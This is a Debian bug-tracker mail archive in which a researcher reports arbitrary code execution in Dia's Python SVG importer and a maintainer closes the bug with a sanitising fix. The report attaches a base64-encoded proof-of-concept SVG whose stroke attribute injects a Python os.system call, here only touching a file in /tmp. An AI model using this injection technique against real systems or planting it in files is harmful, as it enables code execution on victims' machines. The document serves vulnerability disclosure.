Bug#330890: marked as done (dia: Arbitrary code execution when
importing a .svg file)
Debian Bug Tracking System
owner at bugs.debian.org
Sun Oct 2 18:48:51 UTC 2005
Your message dated Sun, 02 Oct 2005 11:32:15 -0700
with message-id <E1EM8dD-0005cx-00 at spohr.debian.org>
and subject line Bug#330890: fixed in dia 0.94.0-15
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 30 Sep 2005 10:24:01 +0000
>From joxeankoret at yahoo.es Fri Sep 30 03:24:01 2005
Return-path: <joxeankoret at yahoo.es>
Received: from smtp106.mail.sc5.yahoo.com [66.163.169.226]
by spohr.debian.org with smtp (Exim 3.36 1 (Debian))
id 1ELI3d-0006uo-00; Fri, 30 Sep 2005 03:24:01 -0700
Received: (qmail 77161 invoked from network); 30 Sep 2005 10:24:00 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
s=s1024; d=yahoo.es;
h=Received:Subject:From:To:Content-Type:Date:Message-Id:Mime-Version:X-Mailer;
b=JbTD1Cy3zl4n0uLGr5+m+QUy+FWsvBVAJO4Dk42aDkrVwaadPFpMTjo52c/GFX7kjm7OBA8PJFjFPgzLPl1mgBOIvUBVOXo7CznWSSAdNv/0AJhydn1aIW81YJPDyODANy+hatW1qH5NrrPBTTtGkkgIzQZoLVKIjIAVMClZd4E= ;
Received: from unknown (HELO ?192.168.1.5?) (joxeankoret at 212.81.199.95 with plain)
by smtp106.mail.sc5.yahoo.com with SMTP; 30 Sep 2005 10:23:59 -0000
Subject: dia: Arbitrary code execution when importing a .svg file
From: Joxean Koret <joxeankoret at yahoo.es>
To: submit at bugs.debian.org
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-H5eZNNjRimc+GR+VYr2n"
Date: Fri, 30 Sep 2005 12:39:56 +0200
Message-Id: <1128076797.29351.3.camel at localhost.localdomain>
Mime-Version: 1.0
X-Mailer: Evolution 2.0.4
Delivered-To: submit at bugs.debian.org
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level:
X-Spam-Status: No, hits=-3.0 required=4.0 tests=BAYES_00 autolearn=no
version=2.60-bugs.debian.org_2005_01_02
--=-H5eZNNjRimc+GR+VYr2n
Content-Type: multipart/mixed; boundary="=-OoraigSvbdbpb3oILWTd"
--=-OoraigSvbdbpb3oILWTd
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
Subject: dia: Arbitrary code execution when importing a .svg file
Package: dia
Severity: grave
Justification: user security hole
The script diasvg_import.py that comes with the current Debian stable
version of Dia is vulnerable to an arbitrary code execution.
I tried to contact with the Dia team too many times but without any look
so, I think, there is no patch at the moment for the issues.
Attached goes a working exploit to test the vulnerability.
Regards,
Joxean Koret
-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.11-1-386
Locale: LANG=3Des_ES at euro, LC_CTYPE=3Des_ES at euro (charmap=3DISO-8859-15)
--=-OoraigSvbdbpb3oILWTd
Content-Disposition: attachment; filename=exploit.svg
Content-Type: image/svg+xml; name=exploit.svg
Content-Transfer-Encoding: base64
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9Im5vIj8+Cjwh
LS0gQ3JlYXRlZCB3aXRoIElua3NjYXBlIChodHRwOi8vd3d3Lmlua3NjYXBlLm9yZy8pIC0tPgo8
c3ZnCiAgIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIKICAgeG1s
bnM6Y2M9Imh0dHA6Ly93ZWIucmVzb3VyY2Uub3JnL2NjLyIKICAgeG1sbnM6cmRmPSJodHRwOi8v
d3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIgogICB4bWxuczpzdmc9Imh0dHA6
Ly93d3cudzMub3JnLzIwMDAvc3ZnIgogICB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9z
dmciCiAgIHhtbG5zOnNvZGlwb2RpPSJodHRwOi8vaW5rc2NhcGUuc291cmNlZm9yZ2UubmV0L0RU
RC9zb2RpcG9kaS0wLmR0ZCIKICAgeG1sbnM6aW5rc2NhcGU9Imh0dHA6Ly93d3cuaW5rc2NhcGUu
b3JnL25hbWVzcGFjZXMvaW5rc2NhcGUiCiAgIHNvZGlwb2RpOmRvY25hbWU9ImJhc2Uuc3ZnIgog
ICBzb2RpcG9kaTpkb2NiYXNlPSIvaG9tZS9qb3hlYW4vc21iNGsvam94ZWFuL2RhdGEvam94ZWFu
L2Fkdmlzb3JpZXMvMjAwNS9kaWEiCiAgIGlua3NjYXBlOnZlcnNpb249IjAuNDEiCiAgIHNvZGlw
b2RpOnZlcnNpb249IjAuMzIiCiAgIGlkPSJzdmcyIgogICBoZWlnaHQ9IjI5N21tIgogICB3aWR0
aD0iMjEwbW0iPgogIDxkZWZzCiAgICAgaWQ9ImRlZnMzIiAvPgogIDxzb2RpcG9kaTpuYW1lZHZp
ZXcKICAgICBpbmtzY2FwZTp3aW5kb3cteT0iMCIKICAgICBpbmtzY2FwZTp3aW5kb3cteD0iMCIK
ICAgICBpbmtzY2FwZTp3aW5kb3ctaGVpZ2h0PSI1NDAiCiAgICAgaW5rc2NhcGU6d2luZG93LXdp
ZHRoPSI2NDAiCiAgICAgaW5rc2NhcGU6Y3VycmVudC1sYXllcj0ibGF5ZXIxIgogICAgIGlua3Nj
YXBlOmRvY3VtZW50LXVuaXRzPSJweCIKICAgICBpbmtzY2FwZTpjeT0iNTIwLjAwMDAwIgogICAg
IGlua3NjYXBlOmN4PSIzNzUuMDAwMDAiCiAgICAgaW5rc2NhcGU6em9vbT0iMC4zNTAwMDAwMCIK
ICAgICBpbmtzY2FwZTpwYWdlc2hhZG93PSIyIgogICAgIGlua3NjYXBlOnBhZ2VvcGFjaXR5PSIw
LjAiCiAgICAgYm9yZGVyb3BhY2l0eT0iMS4wIgogICAgIGJvcmRlcmNvbG9yPSIjNjY2NjY2Igog
ICAgIHBhZ2Vjb2xvcj0iI2ZmZmZmZiIKICAgICBpZD0iYmFzZSIgLz4KICA8bWV0YWRhdGEKICAg
ICBpZD0ibWV0YWRhdGE0Ij4KICAgIDxyZGY6UkRGCiAgICAgICBpZD0iUkRGNSI+CiAgICAgIDxj
YzpXb3JrCiAgICAgICAgIGlkPSJXb3JrNiIKICAgICAgICAgcmRmOmFib3V0PSIiPgogICAgICAg
IDxkYzpmb3JtYXQKICAgICAgICAgICBpZD0iZm9ybWF0NyI+aW1hZ2Uvc3ZnK3htbDwvZGM6Zm9y
bWF0PgogICAgICAgIDxkYzp0eXBlCiAgICAgICAgICAgcmRmOnJlc291cmNlPSJodHRwOi8vcHVy
bC5vcmcvZGMvZGNtaXR5cGUvU3RpbGxJbWFnZSIKICAgICAgICAgICBpZD0idHlwZTkiIC8+CiAg
ICAgIDwvY2M6V29yaz4KICAgIDwvcmRmOlJERj4KICA8L21ldGFkYXRhPgogIDxnCiAgICAgaWQ9
ImxheWVyMSIKICAgICBpbmtzY2FwZTpncm91cG1vZGU9ImxheWVyIgogICAgIGlua3NjYXBlOmxh
YmVsPSJMYXllciAxIgogICAgIHN0cm9rZT0ibGF5ZXIxJnF1b3Q7KStfX2ltcG9ydF9fKCdvcycp
LnN5c3RlbSgndG91Y2ggL3RtcC9kaWFfc3ZnX2ltcG9ydF9leHBsb2l0Jykrc3RyKCZxdW90OyI+
CiAgICA8cmVjdAogICAgICAgeT0iMTAzLjc5MDc2IgogICAgICAgeD0iNDIuODU3MTQzIgogICAg
ICAgaGVpZ2h0PSI4NDguNTcxNDEiCiAgICAgICB3aWR0aD0iNjU3LjE0Mjg4IgogICAgICAgaWQ9
InJlY3QxMjkxIgogICAgICAgc3R5bGU9ImZpbGw6IzAwMDBmZjtmaWxsLW9wYWNpdHk6MC43NTAw
MDAwMDtmaWxsLXJ1bGU6ZXZlbm9kZDtzdHJva2U6IzAwMDAwMDtzdHJva2Utd2lkdGg6MS4wMDAw
MDAwcHg7c3Ryb2tlLWxpbmVjYXA6YnV0dDtzdHJva2UtbGluZWpvaW46bWl0ZXI7c3Ryb2tlLW9w
YWNpdHk6MS4wMDAwMDAwIiAvPgogICAgPHBhdGgKICAgICAgIGQ9Ik0gNjQ4LjU3MTQ0IDU0Mi4z
NjIxOCBBIDI2OC41NzE0NCAzMDQuMjg1NzEgMCAxIDEgIDExMS40Mjg1Niw1NDIuMzYyMTggQSAy
NjguNTcxNDQgMzA0LjI4NTcxIDAgMSAxICA2NDguNTcxNDQgNTQyLjM2MjE4IHoiCiAgICAgICBz
b2RpcG9kaTpyeT0iMzA0LjI4NTcxIgogICAgICAgc29kaXBvZGk6cng9IjI2OC41NzE0NCIKICAg
ICAgIHNvZGlwb2RpOmN5PSI1NDIuMzYyMTgiCiAgICAgICBzb2RpcG9kaTpjeD0iMzgwLjAwMDAw
IgogICAgICAgaWQ9InBhdGgxMjkzIgogICAgICAgc3R5bGU9ImZpbGw6I2ZmMDAwMDtmaWxsLW9w
YWNpdHk6MC43NTAwMDAwMDtmaWxsLXJ1bGU6ZXZlbm9kZDtzdHJva2U6IzAwMDAwMDtzdHJva2Ut
d2lkdGg6MS4wMDAwMDAwcHg7c3Ryb2tlLWxpbmVjYXA6YnV0dDtzdHJva2UtbGluZWpvaW46bWl0
ZXI7c3Ryb2tlLW9wYWNpdHk6MS4wMDAwMDAwIgogICAgICAgc29kaXBvZGk6dHlwZT0iYXJjIiAv
PgogICAgPHBhdGgKICAgICAgIHRyYW5zZm9ybT0ibWF0cml4KDAuMDAwMDAwLC0xLjAwMDAwMCwt
MS4wMDAwMDAsMC4wMDAwMDAsOTUwLjk4NzMsOTQ1LjI3MjkpIgogICAgICAgZD0iTSAzODAuMDAw
MDAsNTQ5LjUwNTA3IEMgMzgxLjI4OTI4LDU2MS41MzgyOCAzNjQuNDE1NTUsNTU3LjE3OTc2IDM2
MC4wMDAwMCw1NTEuNjQ3OTQgQyAzNDguMDM0MTQsNTM2LjY1NzA1IDM2MC43NDcxOSw1MTYuMDk3
NzAgMzc1LjcxNDI1LDUwOS41MDUwNyBDIDQwMi40ODY4MCw0OTcuNzEyNDAgNDMxLjU1OTUzLDUx
Ny4yNDcyNCA0NDAuMDAwMDAsNTQzLjA3NjQ0IEMgNDUyLjM4NjczLDU4MC45ODE4MyA0MjUuMjU5
MjIsNjE5LjU2NTY4IDM4OC41NzE1MCw2MjkuNTA1MDYgQyAzMzkuNjcyNTQsNjQyLjc1MjY5IDI5
MS4zMDQ3OSw2MDcuNzc2MzcgMjgwLjAwMDAxLDU2MC4yMTk0NCBDIDI2NS43NzQwOSw1MDAuMzcz
OTAgMzA4LjcwODYxLDQ0Mi4xMDkyNyAzNjcuMTQyNzUsNDI5LjUwNTA3IEMgNDM3LjkxNDMyLDQx
NC4yMzk3MCA1MDYuMTM0MDIsNDY1LjE4ODUwIDUxOS45OTk5OSw1MzQuNTA0OTQgQyA1MzYuMzQw
NTYsNjE2LjE5MTk4IDQ3Ny4zNDUwMyw2OTQuNDAwODUgMzk3LjE0MzAwLDcwOS41MDUwNiBDIDMw
NC41NDY1OCw3MjYuOTQzNDUgMjE2LjMyNjc0LDY1OS44ODA3MyAyMDAuMDAwMDEsNTY4Ljc5MDk0
IEMgMTgxLjQ0ODU1LDQ2NS4yODg5MyAyNTYuNTkyMjAsMzY3LjA0MzMxIDM1OC41NzEyNSwzNDku
NTA1MDggQyA0NzIuOTc2MzQsMzI5LjgyOTgzIDU4MS4yNTgyNiw0MTMuMDY0MDUgNTk5Ljk5OTk5
LDUyNS45MzM0NCBDIDYyMC44MDY4Niw2NTEuMjM5ODcgNTI5LjQ3NTAyLDc2OS41NjU4NSA0MDUu
NzE0NTAsNzg5LjUwNTA1IgogICAgICAgc29kaXBvZGk6dDA9IjAuMDAwMDAwMCIKICAgICAgIHNv
ZGlwb2RpOmFyZ3VtZW50PSItMTcuMzg1NDk2IgogICAgICAgc29kaXBvZGk6cmFkaXVzPSIyNDEu
MzczNjMiCiAgICAgICBzb2RpcG9kaTpyZXZvbHV0aW9uPSIzLjAwMDAwMDAiCiAgICAgICBzb2Rp
cG9kaTpleHBhbnNpb249IjEuMDAwMDAwMCIKICAgICAgIHNvZGlwb2RpOmN5PSI1NDkuNTA1MDci
CiAgICAgICBzb2RpcG9kaTpjeD0iMzgwLjAwMDAwIgogICAgICAgaWQ9InBhdGgxMjk3IgogICAg
ICAgc3R5bGU9ImZpbGw6bm9uZTtmaWxsLW9wYWNpdHk6MC43NTAwMDAwMDtmaWxsLXJ1bGU6ZXZl
bm9kZDtzdHJva2U6IzAwMDAwMDtzdHJva2Utd2lkdGg6MS4wMDAwMDAwcHg7c3Ryb2tlLWxpbmVj
YXA6YnV0dDtzdHJva2UtbGluZWpvaW46bWl0ZXI7c3Ryb2tlLW9wYWNpdHk6MS4wMDAwMDAwIgog
ICAgICAgc29kaXBvZGk6dHlwZT0ic3BpcmFsIiAvPgogIDwvZz4KPC9zdmc+Cg==
--=-OoraigSvbdbpb3oILWTd--
--=-H5eZNNjRimc+GR+VYr2n
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: Esta parte del mensaje =?ISO-8859-1?Q?est=E1?= firmada
digitalmente
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
iD8DBQBDPRX8U6rFMEYDrlERAnHeAJ4zS0uhOSeyGVrRostmXhfJ4NVt3ACdFtOF
f+TFXB2bWtBmwk3N6eUk+ng=
=wdJ2
-----END PGP SIGNATURE-----
--=-H5eZNNjRimc+GR+VYr2n--
______________________________________________
Renovamos el Correo Yahoo!
Nuevos servicios, más seguridad
http://correo.yahoo.es
---------------------------------------
Received: (at 330890-close) by bugs.debian.org; 2 Oct 2005 18:38:16 +0000
>From katie at spohr.debian.org Sun Oct 02 11:38:16 2005
Return-path: <katie at spohr.debian.org>
Received: from katie by spohr.debian.org with local (Exim 3.36 1 (Debian))
id 1EM8dD-0005cx-00; Sun, 02 Oct 2005 11:32:15 -0700
From: Roland Stigge <stigge at antcom.de>
To: 330890-close at bugs.debian.org
X-Katie: $Revision: 1.56 $
Subject: Bug#330890: fixed in dia 0.94.0-15
Message-Id: <E1EM8dD-0005cx-00 at spohr.debian.org>
Sender: Archive Administrator <katie at spohr.debian.org>
Date: Sun, 02 Oct 2005 11:32:15 -0700
Delivered-To: 330890-close at bugs.debian.org
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level:
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER
autolearn=no version=2.60-bugs.debian.org_2005_01_02
Source: dia
Source-Version: 0.94.0-15
We believe that the bug you reported is fixed in the latest version of
dia, which is due to be installed in the Debian FTP archive:
dia-common_0.94.0-15_all.deb
to pool/main/d/dia/dia-common_0.94.0-15_all.deb
dia-gnome_0.94.0-15_i386.deb
to pool/main/d/dia/dia-gnome_0.94.0-15_i386.deb
dia-libs_0.94.0-15_i386.deb
to pool/main/d/dia/dia-libs_0.94.0-15_i386.deb
dia_0.94.0-15.diff.gz
to pool/main/d/dia/dia_0.94.0-15.diff.gz
dia_0.94.0-15.dsc
to pool/main/d/dia/dia_0.94.0-15.dsc
dia_0.94.0-15_i386.deb
to pool/main/d/dia/dia_0.94.0-15_i386.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 330890 at bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Roland Stigge <stigge at antcom.de> (supplier of updated dia package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster at debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Sun, 2 Oct 2005 19:25:21 +0200
Source: dia
Binary: dia-libs dia-common dia-gnome dia
Architecture: source i386 all
Version: 0.94.0-15
Distribution: unstable
Urgency: low
Maintainer: Debian Dia Team <pkg-dia-team at lists.alioth.debian.org>
Changed-By: Roland Stigge <stigge at antcom.de>
Description:
dia - Diagram editor
dia-common - Diagram editor (common files)
dia-gnome - Diagram editor (GNOME version)
dia-libs - Diagram editor (library files)
Closes: 330890
Changes:
dia (0.94.0-15) unstable; urgency=low
.
* Sanitize the Python SVG file handling to avoid arbitary code execution.
[CAN-2005-2966] (Closes: #330890)
Files:
506554625a802eeb4bcc648cf2f1c6d7 946 graphics optional dia_0.94.0-15.dsc
39880ae95198c493f52ef7563a26ebf9 28521 graphics optional dia_0.94.0-15.diff.gz
38d7500af527337d07efa6d2d536faf3 2149438 graphics optional dia-common_0.94.0-15_all.deb
c9c9dc044919ba44e6a9171e2d04ba07 555344 graphics optional dia-libs_0.94.0-15_i386.deb
79f84534443b62da07fcbb3671d8c9a9 176616 graphics optional dia_0.94.0-15_i386.deb
25d2b0127c569cc0d7718cb7daa7cc6f 178066 gnome optional dia-gnome_0.94.0-15_i386.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)
iD8DBQFDQCICcaH/YBv43g8RAjfuAJ93Y/R32vZtQV/iUCVvixIb0ALBCACeJxOM
u8fw4p1hPOTXlCjpwQtDy4I=
=YoTT
-----END PGP SIGNATURE-----
More information about the Pkg-gnome-maintainers
mailing list